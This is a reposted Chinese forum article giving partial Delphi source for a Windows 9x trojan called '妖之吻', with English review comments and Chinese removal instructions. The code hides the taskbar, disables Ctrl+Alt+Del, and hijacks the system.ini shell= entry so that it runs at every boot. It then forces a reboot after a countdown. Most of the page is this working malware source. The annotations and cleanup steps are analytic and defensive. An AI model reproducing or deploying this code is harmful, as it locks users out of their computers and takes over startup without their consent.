
[转载]妖之吻部分源代码

[转载]妖之吻部分源代码

文章作者:千年老妖

远程关机木马“妖之吻”应该听说过吧，下面是部分源代码。注意：贴出的这一部分不含任何网络代码（uses 子句里没有网络单元，也没有收发数据的逻辑），能看到的只有本机动作——倒计时重启、隐藏任务栏、屏蔽系统热键、改写 system.ini 的 shell= 项；所谓“远程”的部分不在这个片段里。

（清除方法：把 system.ini 中 [boot] 节的 shell= 值改回 explorer.exe——代码把它替换成了木马自身 exe 的完整路径——然后删除该 exe。这是 Windows 9x/ME 通过 system.ini 指定外壳的启动机制；应先改回 shell= 再重启，否则下次开机仍会运行木马并进入倒计时重启。代码中“20 次启动后自动恢复”的逻辑实际上不会生效，见下文注释。）

unit Unit1;

interface

uses

Windows, Messages, SysUtils, Classes,inifiles, Graphics, Controls, Forms, Dialogs

,

StdCtrls, ExtCtrls, Buttons;

type

// Main (and only) form of this unit. All behaviour is driven from the form's
// own event handlers below; there is no other entry point in what is shown.
TForm1 = class(TForm)

Timer1: TTimer; // when it fires, Timer1Timer calls ExitWindowsEx(EWX_REBOOT, 0)

Label1: TLabel;

Timer2: TTimer; // countdown tick: Timer2Timer decrements the global i and shows it in Label2

Label2: TLabel; // displays the remaining countdown value

SpeedButton1: TSpeedButton; // debug-only exit button (see SpeedButton1Click)

procedure Timer1Timer(Sender: TObject); // issues the reboot request

procedure FormCreate(Sender: TObject); // hides the taskbar, blocks hotkeys, rewrites system.ini shell=

procedure FormClose(Sender: TObject; var Action: TCloseAction); // re-enables the blocked hotkeys

procedure Timer2Timer(Sender: TObject); // countdown; arms Timer1 when the count reaches 1

procedure SpeedButton1Click(Sender: TObject); // debug exit (stops timers, terminates)

private

{ Private declarations }

public

{ Public declarations }

end;

var

// Global instance of the main form (normally auto-created by the project
// file, which is not part of this listing).
Form1: TForm1;

implementation

{$R *.DFM}

var

// Handle on system.ini: created in FormCreate, used again in Timer2Timer,
// and never freed.
sysini:tinifile;

// i: countdown value driven by Timer2Timer (set to 60 in FormCreate).
// j: boot counter read from [mci] mcicount in Timer2Timer (unit-level
//    integer, so it starts at 0).
j,i:integer;

procedure TForm1.Timer1Timer(Sender: TObject);

begin

// Runs once Timer2Timer has armed Timer1: ask Windows to reboot immediately.
// ExitWindowsEx returns a BOOL; the result is ignored here.
exitwindowsex(ewx_reboot,0);

end;

procedure TForm1.FormCreate(Sender: TObject);

var

hregion,wndHandle : THandle;

wndClass : array[0..50] of Char;

k:string;

begin

// Give the form an elliptical (non-rectangular) shape.
hregion:=createellipticrgn(14,200,350,14);

setwindowrgn(handle,hregion,true);

// Find the window of class 'Shell_TrayWnd' (the Windows taskbar) and hide it,
// so the user loses the Start menu and task buttons while the countdown runs.
StrPCopy(@wndClass[0], 'Shell_TrayWnd');

wndHandle := FindWindow(@wndClass[0], nil);

ShowWindow(wndHandle, SW_HIDE);

// Countdown start value consumed by Timer2Timer. The unit is Timer2 ticks;
// the tick interval lives in the .DFM, which is not shown here.
i:=60;

// Tool-window extended style, intended to keep the program off the taskbar
// and out of the Alt+Tab list. Note this overwrites the existing extended
// style rather than OR-ing the flag into it.
SetWindowLong(Application.Handle,GWL_EXSTYLE,WS_EX_TOOLWINDOW);

// uiAction 97 = SPI_SCREENSAVERRUNNING (0x61). On Windows 9x/ME setting it to 1
// disables Ctrl+Alt+Del and other system hotkeys; FormClose sets it back to 0.
systemparametersinfo(97,1,nil,0);

// The reboot timer stays disarmed until the countdown in Timer2Timer reaches 1.
timer1.Enabled:=false;

// Persistence: rewrite the [boot] shell= entry of system.ini.
// NOTE(review): the path is relative, so this opens 'system.ini' in the
// process's *current directory*, not necessarily the Windows directory --
// whether the hijack lands depends on where the program was started from.
// The object is kept in the unit-level variable sysini and is never freed.
sysini:=Tinifile.Create('system.ini');

// k is never assigned before this call (Delphi long strings start as ''),
// so the default returned for a missing key is the empty string.
k:=sysini.ReadString('boot','shell',k);

// Only hijack a still-clean shell= line. The author's intent was to restore
// it after 20 boots via the [mci] mcicount counter (see Timer2Timer).
if (k='explorer') or (k='explorer.exe') then

begin

sysini.WriteInteger('mci','mcicount',20);

// Replaces the shell with this executable's own path, so it runs instead of
// Explorer at every boot. Cleanup: set shell= back to explorer.exe.
sysini.WriteString('boot','shell',application.ExeName);

end

end;

procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);

begin

// Undo the hotkey block set in FormCreate (SPI_SCREENSAVERRUNNING := 0).
// This runs when the form is closed normally, e.g. via Alt+F4 -- the gap the
// author mentions below. It does NOT undo the system.ini shell= change.
systemparametersinfo(97,0,nil,0);

end;

procedure TForm1.Timer2Timer(Sender: TObject);

begin

// One countdown tick: decrement the global counter and show what is left.
i:=i-1;

label2.Caption:=inttostr(i);

if i=1 then

begin

// Countdown over: stop ticking and arm Timer1, whose handler reboots.
timer2.Enabled:=false;

timer1.Enabled:=true;

// Intended "restore shell= after 20 boots" logic. j is read from the
// [mci] mcicount value that FormCreate wrote (default is the global j, i.e. 0)
// and decremented -- but the decremented value is never written back, so
// mcicount stays at 20 and j=1 is only reached if the file already holds 2.
// In practice this code never undoes the shell= hijack.
j:=sysini.ReadInteger('mci','mcicount',j);

j:=j-1;

if j=1 then

begin

sysini.WriteString('boot','shell','explorer.exe');

end;

end;

end;

procedure TForm1.SpeedButton1Click(Sender: TObject);

begin

// Debug exit: stop both timers so no reboot is issued, then quit.
timer1.Enabled:=false;

timer2.Enabled:=false;

application.Terminate;

// NOTE(review): this passes 1 (block hotkeys) -- the same value FormCreate
// uses -- not the 0 that FormClose uses to release them. Unless the form's
// OnClose also runs during Terminate, the debug exit leaves hotkeys blocked.
systemparametersinfo(97,1,nil,0);

end;

end.

还存在一个问题：这段代码没有屏蔽 Alt+F4，作者称可以换用别的办法。从分析角度看，用 Alt+F4 关闭窗口会触发 FormClose，其中的 SystemParametersInfo(97,0,nil,0) 会重新启用被屏蔽的系统热键；但 system.ini 里被改掉的 shell= 项不会因此恢复，仍需按上面的清除方法手工改回。
#n3tl04d@gmail.com:-)

